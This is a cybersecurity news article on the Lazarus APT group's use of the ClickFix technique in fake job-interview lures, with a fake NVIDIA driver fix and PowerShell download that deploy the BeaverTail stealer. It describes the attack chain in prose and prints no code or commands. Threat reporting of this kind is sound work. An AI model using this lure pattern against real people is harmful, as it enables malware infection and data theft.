Lazarus APT Hackers Employ ClickFix Technique to Exfiltrate Sensitive Intelligence Data
The notorious Lazarus APT group has adapted its attack strategies by employing the increasingly prevalent ClickFix social engineering technique to distribute malware and extract sensitive intelligence data from targeted organisations. This North Korean-linked threat actor, internally designated as APT-Q-1 by security researchers, has showcased significant adaptability by merging deceptive user interface manipulation with its traditional espionage operations. The ClickFix technique is a sophisticated social engineering method where attackers fabricate technical issues and guide victims through seemingly legitimate “fixes” that ultimately execute malicious code. Lazarus has effectively weaponised this approach within its established fake recruitment campaign infrastructure, creating a multi-layered attack vector that combines job opportunity lures with technical deception.
Recent analyses by CN-SEC analysts have uncovered this campaign through the identification of a malicious batch script that downloads disguised NVIDIA software packages, which subsequently deploy the group’s signature BeaverTail information stealer. The attack chain initiates when victims are lured to fraudulent interview websites, prompting them to prepare their interview environment while claiming that camera configuration issues require immediate resolution. The technical sophistication of this operation extends beyond basic social engineering tactics. Victims are presented with what appears to be a legitimate NVIDIA driver update command, but the underlying payload transforms into a malicious execution sequence. The primary infection vector employs a PowerShell command that downloads and extracts a malicious ZIP archive from compromised infrastructure, targeting both Windows and macOS platforms with tailored payloads for different operating system architectures.
Categories: Cybersecurity Threats, Social Engineering Techniques, Malware Distribution Methods
Tags: Lazarus APT, ClickFix, Social Engineering, Malware, Espionage, Phishing, Cross-Platform, PowerShell, NVIDIA, Information Stealer